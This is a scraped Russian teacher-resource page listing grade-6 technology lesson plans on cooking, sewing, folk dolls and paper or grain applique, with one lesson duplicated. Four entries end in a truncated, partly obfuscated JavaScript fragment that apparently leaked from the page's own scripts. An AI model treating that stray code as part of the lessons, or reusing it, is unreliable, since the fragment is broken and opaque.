Технология

  • Конспект урокаПриготовление блюд из рыбы
  • Технологическая карта (с исправлением) Рамка для фото
  • Лабораторная работа в 6 классе Изучение свойств текстильных материалов из химических волокон
  • Рабочая программа технология 6 класс (надомное обучение)
  • Разработка урока по вышивке
  • Планирование и рабочая программа для 8 классов городских школ по предмету «Технология» девочки
  • Технологическая карта интегрированного урока по технологии и химии на тему Письмо фронтовику (6 класс)Технологическая карта интегрированного занятия по технологии и химии на тему Письмо фронтовику (6 класс) Данное занятие было представленно на образовательном событии Салют Победа, которое проходило на параллели 6-х классов. В ходе занятия обучающиеся узнали способы состаривания бумаги, научились старить бумагу, складывать военный треугольник и оформлять письмо фронтовику. Помимо традиционных способов старения бумаги, ребята познакомились с химическим веществом Fe(CNS)3 (химическая кровь), с...
  • Доклад Планирование учебного процессаЗдравствуйте! Меня зовут Туркина Алла Витальевна. Я учитель технологии (обслуживающий труд) одной из школ города Владикавказ. Планирование учебного процесса особенно на уроках кулинарии является весьма актуальным. Как и всегда - от простого к сложному. Вот только учащимся не очень хочется просто наризать морковь или картофель! Им хочется что-то приготовить и, конечно, продегустировать то, что они приготовили. Задача учителя всё это совместить на одном уроке, а это, поверте, очень трудно.
  • Технологическая карта урока технологии по ФГОС, 6класс. Тема урока: Комнатные растения в интерьере квартирыТехнологическая карта урока технологии по ФГОС, 6класс. Тема урока: Комнатные растения в интерьере квартиры Тип урока: изучение нового материала Оборудование: презентация, видео о цветах, мультимедийное оборудование, дополнительный материал, карточки-задания. На этапе урока мотивация учебной деятельности учитель предлагает просмотреть видеофрагмент, ответить на вопросы и отгадать загадки. Затем обучающиеся формулируют тему и цели урока, на поставленный проблемный вопрос выдвигают гипотезы...
  • Программа кружка Народная кукла (5-6 класс)Актуальность программы состоит в том, что она - обладает наибольшими возможностями для формирования детского коллектива, так как позволяет создавать детям любые формы общения; - развивает мелкую моторику пальцев; - знакомят ребят с историей игрушки; - знакомит с традициями и обрядами русского народа: - изучают историю народной куклы: - традиции и обряды, связанные с куклами: - вовлекает детей и подростков в проведение праздников и воспитывает на традициях русской культуры -способств...
  • Рабочая программа 5-6 классРАБОЧАЯ ПРОГРАММА по курсу Технология. Обслуживающий труд 5-6 класс Программа по технологии для 5-8 классов общеобразовательных учреждений разработана в соответствии с Федеральным компонентом стандарта основного общего образования по технологии, обязательным минимумом содержания основных образовательных программ, требованиями к уровню подготовки выпускников, допущена Министерством образования Российской Федерации, разработана авторским коллективом под руководством чл.-корр. РАО, профес...
  • Урок по материаловедению 6 классЦель: Сформировать начальные знания о швейном материаловедении. Задачи: · Дать общее представление о понятиях натуральные волокна · Ознакомить с характеристиками и свойствами волокон хлопка и льна. · Развивать навыки анализа сравнения. · Укреплять межпредметные связи (литература, изобразительное искусство) · Воспитывать внимательность во время работы. Оборудование: наглядные пособия коллекций Хлопок, Лен, Текстильные волокна; плак...
  • Рабочая программа для неделимых классов по технологии 5-6 классарабочая программа по учебному предметуТехнология Обслуживающий труд, Индустриальные технологии и Сельскохозяйственные технологии разработана для 5-6 класса МБОУ СОШ с. Б. Дмитриевка Лысогорского р-на Саратовской обл. и обеспечивает изучение курса технологии в 2013-2014уч.г. Программа соответствует требованиям федерального государственного образовательного стандарта основного общего образования; Федеральному закону от 29 декабря 2012 года №273-ФЗ Об образовании в Российской Федерации....
  • Презентация по технологии на тему Русский костюм в живописиОдним из самых известных и талантливых русских живописцев второй половины 19 века, который воспел в своих полотнах русскую старину, является Константин Егорович Маковский (1839-1915 гг.). Он написал великое множество ярких картин боярской Руси 17 века. Его красавицы боярышни наряжены в красочные русские одежды и дивные головные уборы, и украшены роскошными серьгами и ожерельями той далёкой эпохи, которые прорисованы с поразительной детализацией.
  • Развернутое тематическое планирование по технологии для 6 класса. Слесарное дело. 8 видРабочая программа составлена наоснове программы: специальной (коррекционной) образовательной школы VIII вида 5-9 классы. Допущено Министерством образования Российской ФедерацииПод ред. В.В. Воронковой.- М: Туманит, изд. Центр ВЛАДОС, 2000г. Программа рассчитана на 70 часов, из расчета 2 часа в неделю. 16 часов отводится на сельхоз работы, так как школа имеет приусадебный участок
  • Раскрой фартукаУрок включает в себя такие подтемы ,как: подготовка ткани к раскрою, раскладка выкройки на ткани. А также включает в себя припуски на швы.Учащиеся должны на уроке по всем правилам произвести раскрой фартука с учетом объяснения учителя.Также урок включает в себя закрепление новой темы в виде подготовленных учителем вопросов относящихся к данной теме.
  • Обработка гладкого накладного кармана прямоугольной формы и соединение его с основной детальюКонспект открытого урока в 6 классе по швейному делу с использованием технологии разноуровневого обучения на тему: Обработка гладкого накладного кармана прямоугольной формы и соединение его с основной деталью. Цель: научить учащихся обрабатывать накладной карман прямоугольной формы и соединять его с основной деталью на образце.
  • Открытый урок по технологии на тему Құрақ құрау әдістері (6 класс) Сабақтың тақырыбы: Құрақ құрау әдістеріСабақтың мақсаты: Білімділік: құрақ құрау әдісін үйрету, құрақтың түрлерімен таныстыру, құрақтың тұрмысымыздағы алатын орны жайлы білім беру.Дамытушылық: құрақ өнерін жетілдіру, оқушылардың ойлау қабілетің, шеберліктерін дамыту.Тәрбиелік: құрақ құрау өнері арқылы қыз баланы әсемдікке, кез келген затты қиюластыра білуге, үнемділікке тәрбиелеу.Сабақтың түрі: аралас сабақ. Пәнаралық байланыс: геометрия, сызу, математика, дүние тану, бейнелеу өнері. Саба...
  • Пояснительная записка по технологии 6 классРабочая программа по предмету Технология для обучающихся 6 класса составлена на основе Примерные программы по учебным предметам, по рабочей программеТехнология 5-8 класс. Автор О.А. Кожина. Включены еще такие разделы: общая характеристика предмета, место предмета в учебном плане, личностные, предметные и метопредметные результаты, содержание учебного предмета, поурочное планирование, учебно-методическое и материально-техническое обеспечение, планируемые результаты.
  • Коллективные работы по технологии для 1-6 классовВнеклассное мероприятие Наш край родной Чем увлечь малышей первого и второго классов. В таком возрасте им нравится больше всего играть или делать что-то своими руками. Я предлагаю построить город из бумаги и картона, с которым можно потом будет играть, изучать правила дорожного движения. В процессе работы, столь увлекательной для детей, развиваются навыки работы с различными материалами. Здесь и вырезание по линии, и объемное склеивание, и черчение, и рисование. Развивается моторика рук, ...
  • Урок технологии для мальчиков в 6 классе. Цель урока: Ознакомить учащихся с видами художественной резьбы по древесинеЭтот урок технологии для мальчиков в 6 классе .Учебник .Технология. Технический труд : 6 класс .Автор учебника Самородский П. С. Цель урока: Ознакомить учащихся с видами художественной резьбы по древесине. Тема : Создание декоративно – прикладных изделий из древесины. В ходе урока обучающийся знакомятся с теоретической частью по презентации и учебнику , выставкой творческих работ, представленной в мастерской. В практической работе они чертят разметку на заготовку и выполняют элемент...
  • Таблица для проверки расчетов построения чертежа прямой юбки В разработке представлен материал для проверки расчетов при построении чертежа прямой юбки в 6 классе. При изучении раздела Создание изделий из текстильных и поделочных материалов в подразделе Конструирование и моделирование поясных швейных изделий учащиеся строят чертеж прямой юбки по своим меркам. При выполнении расчетов ученицы часто допускают ошибки. Данная таблица, выполненная в Excel, позволяет ученицам выполнить самоконтроль своих расчетов и помогает учителю быстро проконтроли...
  • Методическая разработка внеклассного музейного занятияПредложенная разработка внеклассного занятия в школьном музее, где рассказывается о национальных костюмах народов, проживающих в нашем регионе и других экспонатах музея, выполненных учениками нашей школы. хотя занятие проводится с группой девочек 5,6 классов, можно использовать данный материал для классных часов и внеклассных мероприятий в других возрастных группах.
  • Технологическая карта Построение чертежа прямой юбки Данная разработка может быть использована на уроке технологии в 6 классе при изучении раздела Создание изделий из текстильных и поделочных материалов в подразделе Конструирование и моделирование поясных швейных изделий. Построение чертежа прямой юбки в учебнике дается очень объемно и сложно для восприятия. В данном материале расчет построения записан с помощью символов и более просто. За основу взято построение чертежа прямой юбки из учебника для 6 класса под редакцией В.Д. Симонен...
  • Урок технологии по ФГОС Уход за одеждойданный урок разработан в соответствии с ФГОС, имеет подробную инструкционно-технологическую карту урока,подробно расписаны УУД на каждом этапе урока, данный урок является комбинированным и расчитан на 45 минут учебного времени.Цель урока: формировать представление учащихся о способах ухода за одеждой.
  • Урок по профессионально-трудовому обучению на тему Группы овощных культур (6 класс)1.Познакомить обучающихся с группами овощных культур, научить распределять овощные культуры по группам. 2.Развивать познавательные способности, умение работать в группах, активизировать мыслительную деятельность на основе упражнений в разгадывании ребусов, кроссвордов коррегировать слуховое восприятие путем слушания текста, коррекция и развитие речи, путем ответов на вопросы учителя, коррекция логи...
  • Конструкт - урока по технологии. Аппликация из зёрен Бабочка ( 6 класс), ГКС (К) ОУ школа - интернат № 12 VIII видаТема : аппликация из окрашенных зёрен - Бабочка. Цели урока : совершенствование навыков в технике аппликации. Развивать творческие способности воображения; воспитывать у детей аккуратность, эсте-тический вкус, глубокие и устойчивые интересы к художественному труду. Тип урока : урок освоения новых знаний и способов действий. Универсальные учебные действия : ... Этап урока, виды работ Деятельность учителя Деятельность учащихся УУД I. Организационный этап 1.Приветствие 2. Представление 3. Проверка готовности рабочих мест - Здравствуйте, садитесь. - Меня зовут Ульяна Викторовна, сегодня урок технологии у Вас буду вести я. - Прозвенел звонок и смолк, Нам пора начать урок! Сели тихо, замолчали. Всё, что надо вы достали. Приготовились к уроку, В нём иначе нету проку. ... - Приветствие; - Проверка готов-ности рабочих мест Р3 К1 II. Постановка цели и задач уро-ка. Мотивация учебной деятель-ности учащихся. 1. Мотивация дея-тельности учащи-хся. 2. Раскрытие те-мы через загадку. - На большой цветной ковёр Села эскадрилья - То раскроет, то закроет Расписные крылья. Слайд 1. - Сегодня нам предстоит очень кропотливая работа. Мы будем изготовлять аппликацию из нео-бычного материала - крашенного зерна в виде мозаики. - Ответ учащихся (бабочка). - Знакомство с целью урока. П1 III. Актуализация опорных знаний. 1. Повторение понятия апплика-ция. - Ребята, кто ответит мне, что такое аппликация ? - Что такое мозаика? - Аппликация - один из видов изобразительной техники, который основан на выре-зании и наложе-нии различных материалов на определённый фон. Мозаика - это узор из скреп-лённых друг с другом кусочков различных твёр-дых материалов. IV. Первичное усвоение новых знаний. 1. Рассказ о бабо-чках и зерне. 2. Рассказ уча-щихся о бабочках и зёрнах. - Сегодня мы будем изготавли-вать аппликацию - мозаику из зёрен, которое мы привыкли видеть на столе в виде каш. - Какие крупы Вы знаете ? - А Вы знаете как получают кру-пы ? - Рис растёт в чеках. Слайд 2. Это плоские поля, окружённые небольшими дамбами, залитые водой. Рис очень распространё-нный продукт. Его употребляют в пищу люди во всём мире. В Китае, Японии, ... - Крупы делают из злаковых куль-тур, которые вы-ращивают на по-лях. - Беленькие бабочки. К1 П1 П3 V. Динамическая пауза. - Мы шагаем друг за другом, Лесом и зелёным лугом, Крылья пёстрые мелькают, В поле бабочки летают. Раз, два, три, четыре, Полетели закружились. - Шагают на мес-те. - Изображают ба-бочек : машут ру-ками и кружатся. VI. Организация самостоятельной работы. 1. Пошаговая ин-струкция по вы-полнению работы - Нашу работу мы начнём с ок-рашивания зёрен. Для этого по-дайдут обычные пластиковые стаканчики. Разбавив краски водой, засыпаем пшено или рис и тщательно размешиваем пало-чкой. Когда зёрна окрашены, их нужно выложить для сушки на чистый лист бумаги равномер-ным слоем. Когда зёрна подсох-нут, отделите их от бумаги и друг от друга. Для этого круго-выми движениями нажимайте на слой зёрен. Политра красок очень широка. Разные оттенки красного, голубого, зелёного, чёрный, коричневый, розовый и мног... - Выполнение ра-боты. К1 П2 Р2 VI. Рефлексия учебной деятель-ности. 1. Выставка из работ. 2. Итог урока. - Давайте выставим Ваши рабо-ты на доске. - Чьи бабочки получились самы-ми красивыми. - Что Вам понравилось сегодня на уроке ? - Из каких материалов Вы делали сегодня аппликацию ? - В конце занятия раскрасьте ма-леньких бабочек в красный цвет, если урок понравился и синим, если урок не поняли. К3 П3 // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
  • Конструкт - урока по технологии на тему Бабочка ( 6 класс)Тема : аппликация из окрашенных зёрен - Бабочка. Цели урока : совершенствование навыков в технике аппликации. Развивать творческие способности воображения; воспитывать у детей аккуратность, эсте-тический вкус, глубокие и устойчивые интересы к художественному труду. Тип урока : урок освоения новых знаний и способов действий. Универсальные учебные действия : ... Этап урока, виды работ Деятельность учителя Деятельность учащихся УУД I. Организационный этап 1.Приветствие 2. Представление 3. Проверка готовности рабочих мест - Здравствуйте, садитесь. - Меня зовут Ульяна Викторовна, сегодня урок технологии у Вас буду вести я. - Прозвенел звонок и смолк, Нам пора начать урок! Сели тихо, замолчали. Всё, что надо вы достали. Приготовились к уроку, В нём иначе нету проку. ... - Приветствие; - Проверка готов-ности рабочих мест Р3 К1 II. Постановка цели и задач уро-ка. Мотивация учебной деятель-ности учащихся. 1. Мотивация дея-тельности учащи-хся. 2. Раскрытие те-мы через загадку. - На большой цветной ковёр Села эскадрилья - То раскроет, то закроет Расписные крылья. Слайд 1. - Сегодня нам предстоит очень кропотливая работа. Мы будем изготовлять аппликацию из нео-бычного материала - крашенного зерна в виде мозаики. - Ответ учащихся (бабочка). - Знакомство с целью урока. П1 III. Актуализация опорных знаний. 1. Повторение понятия апплика-ция. - Ребята, кто ответит мне, что такое аппликация ? - Что такое мозаика? - Аппликация - один из видов изобразительной техники, который основан на выре-зании и наложе-нии различных материалов на определённый фон. Мозаика - это узор из скреп-лённых друг с другом кусочков различных твёр-дых материалов. IV. Первичное усвоение новых знаний. 1. Рассказ о бабо-чках и зерне. 2. Рассказ уча-щихся о бабочках и зёрнах. - Сегодня мы будем изготавли-вать аппликацию - мозаику из зёрен, которое мы привыкли видеть на столе в виде каш. - Какие крупы Вы знаете ? - А Вы знаете как получают кру-пы ? - Рис растёт в чеках. Слайд 2. Это плоские поля, окружённые небольшими дамбами, залитые водой. Рис очень распространё-нный продукт. Его употребляют в пищу люди во всём мире. В Китае, Японии, ... - Крупы делают из злаковых куль-тур, которые вы-ращивают на по-лях. - Беленькие бабочки. К1 П1 П3 V. Динамическая пауза. - Мы шагаем друг за другом, Лесом и зелёным лугом, Крылья пёстрые мелькают, В поле бабочки летают. Раз, два, три, четыре, Полетели закружились. - Шагают на мес-те. - Изображают ба-бочек : машут ру-ками и кружатся. VI. Организация самостоятельной работы. 1. Пошаговая ин-струкция по вы-полнению работы - Нашу работу мы начнём с ок-рашивания зёрен. Для этого по-дайдут обычные пластиковые стаканчики. Разбавив краски водой, засыпаем пшено или рис и тщательно размешиваем пало-чкой. Когда зёрна окрашены, их нужно выложить для сушки на чистый лист бумаги равномер-ным слоем. Когда зёрна подсох-нут, отделите их от бумаги и друг от друга. Для этого круго-выми движениями нажимайте на слой зёрен. Политра красок очень широка. Разные оттенки красного, голубого, зелёного, чёрный, коричневый, розовый и мног... - Выполнение ра-боты. К1 П2 Р2 VI. Рефлексия учебной деятель-ности. 1. Выставка из работ. 2. Итог урока. - Давайте выставим Ваши рабо-ты на доске. - Чьи бабочки получились самы-ми красивыми. - Что Вам понравилось сегодня на уроке ? - Из каких материалов Вы делали сегодня аппликацию ? - В конце занятия раскрасьте ма-леньких бабочек в красный цвет, если урок понравился и синим, если урок не поняли. К3 П3 // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
  • Конспек - урока по технологии на тему Моллюск ( 6 класс)Тема : Моллюск - аппликация из бумаги и природных материалов. Цели урока : совершенствование навыков техники аппликации, развивать способности к творчеству, воображению, фантазии; прививать навыки культуры, труда, товарищеской взаимопомощи; воспитывать устойчивые интересы к художественному труду. Т... Этапы урока, виды работ Деятельность учителя Деятельность учащихся УУД I. Организационный этап 1. Приветствие 2. Проверка готовности рабочих мест 3. Повторение техники безопасности - Приветствие. - Проверьте, всё ли у вас готово к уроку ? На ваших столах должны лежать: цветная бумага, клей карандаш, ножницы, кукуруза , крупа, трафареты. - Повторим технику безопасности. - Приветствие. - Проверка готовности рабочих мест. - Повторение техники безопасности. Р3 К1 II. Постановка целей и задач урока 1. Мотивация учебной деятельности учащихся 2. Раскрытие темы через загадку - Слайд 1. - Сегодня на уроке мы будем делать аппликацию, а из чего вы узнаете угадав загадку : - Под плотными листками, Жёлтые камни, Упругие, гладкие, На вкус сладкие ? - Кукуруза. П1 III. Актуализация опорных знаний. 1. Повторение понятия аппликация - Кто мне скажет, что такое аппликация ? - Аппликация - это один из видов изобразительной техники, который основан на вырезании и наложении различных материалов на определённый фон. П1 К1 П2 IV. Первичное усвоение новых знаний 1. Рассказ учителя. 2. Рассказ детей о поездке к морю. - Слайд 2. - Родина кукурузы - америка. Индейцы - майя считали, что кукуруза божественный дар и прославляли её в песнях и легендах. У них даже был бог кукурузы Чинтеотль. Они готовили не только зёрна, но и суп из пыльцы, а стебли шли на строительство хижин. В н.в. только 30 % идёт в пищу человека. Она очень питательна, в ней содержатся витамины А, В,С,Е. Кукурузу варят, сушат, консервируют, делают крахмал. ... - Слушают учителя. - 1 ученик : На песке лежит ракушка Перламутровое ушко. Я смеюсь, а море дышит. И она всё это слышит. - 2 ученик: В прорезь раковины узкой Укрываются моллюски, Под скорлупкой перламутра ... К1 П1 П3 V. Динамическая пауза - Море волнуется раз, Море волнуется два, Море волнуется три, Морская фигура на месте замри. - Замирают в различных морских позах. VI. Организация самостоятельной работы 1. Пошаговая инструкция выполнения работы - С помощью шаблона выполняем рисунок рапана на цветной бумаге. Разрезаем на отдельные элементы, которые наклеиваем на картон синего, фиолетового или голубого цвета ( цвет морского дна ). Раковину рапана оклеиваем кукурузой по краям. Средину промазываем клеем и засыпаем крупой. Дорисуем симпатичную мордочку. Наша поделка готова. - Выполнение работы. К1 П2 Р2 VII. Итог урока. Рефлексия. - Давайте сделаем мини выставку из ваших работ на доске. - Что вам понравилось на уроке ? - Если понравился урок и вы его поняли ,то поднимите зелёную карточку, а если нет, то красную. К3 П3 // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
  • Презентация по технологии Тюльпан ( 6 класс)Тема : Тюльпан - аппликация из бумаги с применением техники оригами. Цели урока : совершенствование навыков техники аппликации, развивать способности к творчеству, воображению, фантазии; прививать навыки культуры, труда, товарищеской взаимопомощи; воспитывать устойчивые интересы к художественному труду. Тип урока : урок освоения новых знаний и с... Этапы урока, виды работ Деятельность учителя Деятельность учащихся УУД I. Организационный этап 1. Приветствие 2. Проверка готовности рабочих мест 3. Повторение техники безопасности - Приветствие. - Проверьте, всё ли у вас готово к уроку ? На ваших столах должны лежать: цветная бумага, клей карандаш, ножницы, мини наклейки бабочек, трафареты. - Повторим технику безопасности. - Приветствие. - Проверка готовности рабочих мест. - Повторение техники безопасности. Р3 К1 II. Постановка целей и задач урока 1. Мотивация учебной деятельности учащихся 2. Раскрытие темы через загадку - Нам предстоит тяжелая, но интересная работа, сегодня мы выполним объёмную аппликацию с применением техники оригами. А что мы будем делать, вы узнаете разгадав загадку : Из луковки вырос, Но в пищу не гож. На яркий стаканчик Цветок тот похож. Замечательный цветок, Словно яркий огонёк. ... - Тюльпан П1 III. Актуализация опорных знаний. 1. Повторение понятия аппликация - Кто мне скажет, что такое аппликация ? - Аппликация - это один из видов изобразительной техники, который основан на вырезании и наложении различных материалов на определённый фон. П1 К1 П2 IV. Первичное усвоение новых знаний 1. Рассказ о тюльпанах 2. Рассказ учащихся о своих домашних клумбах. - Слайд 2. - В природе известно около 140 видов тюльпанов, которые растут в горных и степных районах Азии, Сибири и у нас на Кавказе. Первые культурные тюльпаны начали выращивать в Турции в древние времена. Откуда попали в Западную Европу. Сейчас больше всего тюльпанов разводят в Голландии. В Россию тюльпаны попали только в ХVII веке. В ботаническом саду Санкт - Петербурга ведутся работы по выращиванию и распространению и выведению новых сорт... - Слушают учителя. - Рассказывают о цветах, которые растут дома. К1 П1 П3 V. Динамическая пауза - Наши алые цветочки Распускают лепесточки. Ветерок чуть дышит. Лепестки колышет. Наши алые цветочки Закрывают лепестки, Тихо засыпают, Головой качают. - Складывают ладошки в виде тюльпанов. - Делают движения по ходу стихотворения. VI. Организация самостоятельной работы 1. Пошаговая инструкция выполнения работы - Для поделки используют глянцевую красную, розовую , белую и жёлтую бумагу. Приготовим квадрат 10 на 10 см. и складывают его по диагоналям, затем ещё раз пополам, только в обратную сторону. Противоположные углы сводят, что бы образовался двойной треугольник. Острые углы сгибают в верх, поворачивают поделку другой стороной и так же сгибают острые углы. Получившийся квадрат разворачивают гладкими сторонами наружу. Складывают боковые углы с верхней двойной стороной чуть дальше средней линии, что ... - Выполнение работы. К1 П2 Р2 VII. Итог урока. Рефлексия. - Давайте сделаем мини выставку из ваших работ на доске. - Что вам понравилось на уроке ? - Если понравился урок и вы его поняли то поднимите ваши работы, а если нет то не поднимайте. К3 П3 // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(http)==0){return p}for(var e=0;e
© 2010-2018